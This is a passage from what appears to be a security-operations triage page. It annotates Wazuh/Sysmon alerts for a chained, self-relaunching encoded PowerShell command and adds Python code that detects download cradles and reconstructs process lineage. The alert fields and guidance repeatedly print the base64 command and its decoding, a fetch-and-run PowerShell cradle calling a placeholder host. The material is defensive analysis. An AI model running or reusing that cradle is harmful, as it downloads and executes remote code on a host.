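def analyze_cmdline(cmdline):
    """Decode if encoded, then look for cradle indicators in whatever script text we have."""
    b64 = extract_encoded(cmdline)
    decoded = decode_encoded(b64) if b64 else None
    script = decoded if decoded is not None else cmdline
    indicators = []
    if FETCH.search(script):
        indicators.append("remote_fetch")
    if EXEC.search(script):
        indicators.append("dynamic_execution")
    return {"decoded": decoded, "urls": URL.findall(script), "indicators": indicators,
            "download_cradle": len(indicators) == 2}


# Constructed from the CommandLine field of this alert (PID 9884).
ENC = ("SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
       "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
       "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA")
PS = r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_CMDLINE = f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand {ENC}'
# Constructed benign contrast case, not from the page.
PLAIN_CMDLINE = 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Get-Date"'

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, PLAIN_CMDLINE):
        print(analyze_cmdline(line))
```

The indicator check runs over the decoded text when there is one and over the raw command line otherwise, so an unencoded `-Command "IEX (iwr http://...)"` is caught by the same rule.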

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:10.893+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  44
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534230.1308110
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the event IDs and field names follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. A stable filter key when provider names vary.

data.win.system.eventID:  1
Event ID within the provider's channel. For Sysmon: 1 = Process Create, 3 = Network Connection, 11 = FileCreate. These are not Security-log IDs such as 4624 or 4688, even though the numbers are small.

data.win.system.version:  5
Schema version of this event type. When Sysmon bumps it, fields may be added or reordered and decoders or rules can need updating.

data.win.system.level:  4
Numeric level: 4 = Information, 3 = Warning, 2 = Error. Sysmon logs almost everything at 4, so severity comes from the rule, not from here.

data.win.system.task:  1
Task category. Sysmon sets it to the same number as the event ID, so it adds nothing beyond eventID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:02.5885586Z
When the event was written to the channel (UTC). Compare with data.win.eventdata.utcTime, the moment Sysmon observed the action; a large gap points at a busy or backlogged host.

data.win.system.eventRecordID:  283390
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event – the Sysmon service itself, not the process being reported. The subject's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the logging (Sysmon) process. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational is Sysmon telemetry; confirm it is being forwarded and that its size limit is not rolling events off before the agent reads them.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. It should match agent.name; a mismatch means the event was forwarded from another host or the machine was renamed.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:01.400 ProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} ProcessId: 9884 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00} ParentProcessId: 11360 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full rendered event text from which every data.win.eventdata field below is parsed. Read it when a parsed field looks truncated or oddly escaped; the JSON view doubles backslashes and escapes quotes.

data.win.eventdata.utcTime:  2025-04-24 22:37:01.400
When Sysmon observed the process start (UTC). Use this, not the Wazuh timestamp, to order host events.

data.win.eventdata.processGuid:  {94294ddc-bd0d-680a-1d0b-000000000e00}
Sysmon GUID for the new process, unique across reboots (PIDs are recycled). This is the pivot key: the same value is the processGuid on the EID 11 file create at 22:37:03 and the parentProcessGuid on the Process Create alert for PID 8832 later on this page.

data.win.eventdata.processId:  9884
Windows PID. Reused after the process exits, so correlate on processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable launched – the built-in Windows PowerShell 5.1 host. A copy running from any other path is suspicious in itself.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the image's PE resource; confirms which Windows build of powershell.exe ran.

data.win.eventdata.description:  Windows PowerShell
PE version-info string. Trivial to fake in a custom binary, so use it to spot oddities, not to establish trust.

data.win.eventdata.product:  Microsoft® Windows® Operating System
PE version-info string (see description).

data.win.eventdata.company:  Microsoft Corporation
PE version-info string (see description).

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE header. If it differs from the image name (PowerShell.EXE running as, say, svchost.exe), the binary was renamed to dodge name-based detection.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line. -EncodedCommand takes base64 of the UTF-16LE script, so decode it before judging the alert; this one resolves to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). -NoLogo -NoProfile and a duplicated image path are typical of scripted launches. PowerShell also accepts abbreviations such as -e or -enc, so do not match on the full switch name only.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process – where it was launched from. A user profile root is consistent with an interactive or script launch.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as (DOMAIN\user). The domain part equals the hostname, so this is a local account, not a domain identity.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session. Pivot to Security event 4624 with the same Logon GUID to see how and from where this session was established.

data.win.eventdata.logonId:  0x26584
Logon session ID (hex). Also present in 4624 and 4688, so every process from this session can be pulled with one filter.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 = services, 1 or higher = an interactive user session (console or RDP).

data.win.eventdata.integrityLevel:  Medium
Process integrity: Low / Medium / High / System. Medium is a non-elevated user; High means an elevated admin token, System a service-level one.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file (algorithms per the Sysmon config). The same value on every Process Create alert in this chain confirms they are all the genuine powershell.exe; it says nothing about the script it ran.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd0a-680a-190b-000000000e00}
Sysmon GUID of the parent. It is the processGuid of the Process Create alert for PID 11360 earlier on this page, so the tree is already visible: 5848 → 11360 → 9884.

data.win.eventdata.parentProcessId:  11360
PID of the parent at spawn time.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. PowerShell spawning PowerShell is what this rule keys on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line. Here it is identical to the child's, including the same -EncodedCommand payload: the encoded script relaunched itself rather than being started by a different program.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as. A different user between parent and child points at impersonation or a privilege change; here they match.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:11.068+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. Check the file before treating it as a transferred tool: data.win.eventdata.targetFilename is __PSScriptPolicyTest_01e43x2y.p5y.ps1 in the user's %TEMP%, the probe file Windows PowerShell writes on every start-up to test AppLocker/WDAC script enforcement, and the creator is powershell.exe itself. The file is a host artifact; the real signal is the process that wrote it. Pivot on processGuid {94294ddc-bd0d-680a-1d0b-000000000e00} (PID 9884) to its EID 1 alert and decode the -EncodedCommand there.

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:11.068+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  48
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534231.1316177
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the event IDs and field names follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. A stable filter key when provider names vary.

data.win.system.eventID:  11
Event ID within the provider's channel. For Sysmon: 1 = Process Create, 3 = Network Connection, 11 = FileCreate. These are not Security-log IDs such as 4624 or 4688, even though the numbers are small.

data.win.system.version:  2
Schema version of this event type. When Sysmon bumps it, fields may be added or reordered and decoders or rules can need updating.

data.win.system.level:  4
Numeric level: 4 = Information, 3 = Warning, 2 = Error. Sysmon logs almost everything at 4, so severity comes from the rule, not from here.

data.win.system.task:  11
Task category. Sysmon sets it to the same number as the event ID, so it adds nothing beyond eventID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:03.0764574Z
When the event was written to the channel (UTC). Compare with data.win.eventdata.utcTime, the moment Sysmon observed the action; a large gap points at a busy or backlogged host.

data.win.system.eventRecordID:  283407
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event – the Sysmon service itself, not the process being reported. The subject's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the logging (Sysmon) process. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational is Sysmon telemetry; confirm it is being forwarded and that its size limit is not rolling events off before the agent reads them.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. It should match agent.name; a mismatch means the event was forwarded from another host or the machine was renamed.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:03.058 ProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} ProcessId: 9884 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_01e43x2y.p5y.ps1 CreationUtcTime: 2025-04-24 22:37:03.058 User: Attacker\Attcker1"
Full rendered event text from which every data.win.eventdata field below is parsed. Read it when a parsed field looks truncated or oddly escaped; the JSON view doubles backslashes and escapes quotes.

data.win.eventdata.utcTime:  2025-04-24 22:37:03.058
When Sysmon observed the file being created (UTC). Use this, not the Wazuh timestamp, to order host events.

data.win.eventdata.processGuid:  {94294ddc-bd0d-680a-1d0b-000000000e00}
Sysmon GUID of the process that wrote the file. It is unique across reboots (PIDs are recycled) and equals the processGuid on the Process Create alert for PID 9884 above – the pivot that joins this file create to the encoded PowerShell command.

data.win.eventdata.processId:  9884
Windows PID of the writer. Reused after exit, so correlate on processGuid.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file. Here powershell.exe itself, which matters for the next field.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_01e43x2y.p5y.ps1
Full path of the created file. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is the probe file Windows PowerShell writes on start-up to test AppLocker/WDAC script enforcement; it is a host artifact, not a tool brought in by the attacker. The rule fires on location and extension, so keep the alert for the process chain, not for this file.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:03.058
Creation timestamp carried by the file. Normally equals utcTime; an older value means an existing file was overwritten or its timestamp was changed (see Sysmon EID 2).

data.win.eventdata.user:  Attacker\\Attcker1
Account whose process wrote the file (DOMAIN\user). The domain part equals the hostname, so this is a local account.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:11.770+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell. Same encoded command as the two earlier Process Create alerts; it decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download cradle. This process (PID 8832) was spawned by PID 9884, which was spawned by PID 11360, each a powershell.exe with the identical command line, so the payload is relaunching itself. Follow parentProcessGuid past PID 11360 to find the process that started the chain, and check Sysmon EID 3 and proxy logs for the connection to example.com.
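The three Process Create alerts on this page form a chain: PID 11360 (parent 5848), PID 9884 (parent 11360) and PID 8832 (parent 9884), every one a powershell.exe with the identical encoded command line. The Python below is an added example, not SOCscribe or Wazuh code, that reconstructs that lineage from Sysmon EID 1 records by following parentProcessGuid, falls back to the parent* fields Sysmon copies onto the child when the root has no EID 1 of its own (as PID 5848 here), and counts how many hops are the same binary relaunching the same command. The events are constructed from the fields shown in these alerts; the key names follow the data.win.eventdata fields above.

```python
import ntpath

# Sample data constructed from the three "Process Create" alerts on this page.
ENC = ("SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
       "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
       "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand {ENC}'


def ev(guid, pid, parent_guid, parent_pid, utc):
    """One EID 1 record; every process in this chain has the same image and command line."""
    return {"processGuid": guid, "processId": pid, "image": PS, "commandLine": CMD, "utcTime": utc,
            "parentProcessGuid": parent_guid, "parentProcessId": parent_pid,
            "parentImage": PS, "parentCommandLine": CMD}


EID1_EVENTS = [
    ev("{94294ddc-bd0a-680a-190b-000000000e00}", 11360,
       "{94294ddc-bd07-680a-160b-000000000e00}", 5848, "2025-04-24 22:36:58.891"),
    ev("{94294ddc-bd0d-680a-1d0b-000000000e00}", 9884,
       "{94294ddc-bd0a-680a-190b-000000000e00}", 11360, "2025-04-24 22:37:01.400"),
    ev("{94294ddc-bd10-680a-300b-000000000e00}", 8832,
       "{94294ddc-bd0d-680a-1d0b-000000000e00}", 9884, "2025-04-24 22:37:04.739"),
]


def lineage(events, leaf_guid):
    """Walk parentProcessGuid upward from leaf_guid, oldest ancestor first.

    When the parent has no EID 1 of its own (it started before Sysmon, or the event was
    not forwarded), use the parent* fields Sysmon copies onto the child so the root is
    still represented, and mark it as such.
    """
    by_guid = {e["processGuid"]: e for e in events}
    chain, guid, seen = [], leaf_guid, set()
    while guid in by_guid and guid not in seen:     # `seen` guards against GUID loops
        seen.add(guid)
        chain.append(by_guid[guid])
        guid = by_guid[guid]["parentProcessGuid"]
    if chain and guid not in by_guid:
        top = chain[-1]
        chain.append({"processGuid": guid, "processId": top["parentProcessId"],
                      "image": top["parentImage"], "commandLine": top["parentCommandLine"],
                      "from_child_record": True})
    chain.reverse()
    return chain


def same_command_hops(chain):
    """Count parent->child hops where the same image relaunched the identical command line."""
    hops = 0
    for parent, child in zip(chain, chain[1:]):
        if (ntpath.basename(parent["image"]).lower() == ntpath.basename(child["image"]).lower()
                and parent["commandLine"] == child["commandLine"]):
            hops += 1
    return hops


def summarize(chain):
    path = " -> ".join(f"{ntpath.basename(e['image'])}:{e['processId']}" for e in chain)
    return f"{path} ({same_command_hops(chain)} identical re-spawns)"


if __name__ == "__main__":
    print(summarize(lineage(EID1_EVENTS, "{94294ddc-bd10-680a-300b-000000000e00}")))
```

A chain whose every hop is the same command line is a re-launch loop, not a new stage; the process to examine is the one above the first powershell.exe, which these three alerts do not contain.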

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:11.770+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  45
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534231.1318942
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the event IDs and field names follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's. A stable filter key when provider names vary.

data.win.system.eventID:  1
Event ID within the provider's channel. For Sysmon: 1 = Process Create, 3 = Network Connection, 11 = FileCreate. These are not Security-log IDs such as 4624 or 4688, even though the numbers are small.

data.win.system.version:  5
Schema version of this event type. When Sysmon bumps it, fields may be added or reordered and decoders or rules can need updating.

data.win.system.level:  4
Numeric level: 4 = Information, 3 = Warning, 2 = Error. Sysmon logs almost everything at 4, so severity comes from the rule, not from here.

data.win.system.task:  1
Task category. Sysmon sets it to the same number as the event ID, so it adds nothing beyond eventID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:06.0543381Z
When the event was written to the channel (UTC). Compare with data.win.eventdata.utcTime, the moment Sysmon observed the action; a large gap points at a busy or backlogged host.

data.win.system.eventRecordID:  283457
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event – the Sysmon service itself, not the process being reported. The subject's PID is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the logging (Sysmon) process. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational is Sysmon telemetry; confirm it is being forwarded and that its size limit is not rolling events off before the agent reads them.

data.win.system.computer:  Attacker
Hostname Windows stamped on the event. It should match agent.name; a mismatch means the event was forwarded from another host or the machine was renamed.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:04.739 ProcessGuid: {94294ddc-bd10-680a-300b-000000000e00} ProcessId: 8832 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} ParentProcessId: 9884 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:04.739
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd10-680a-300b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

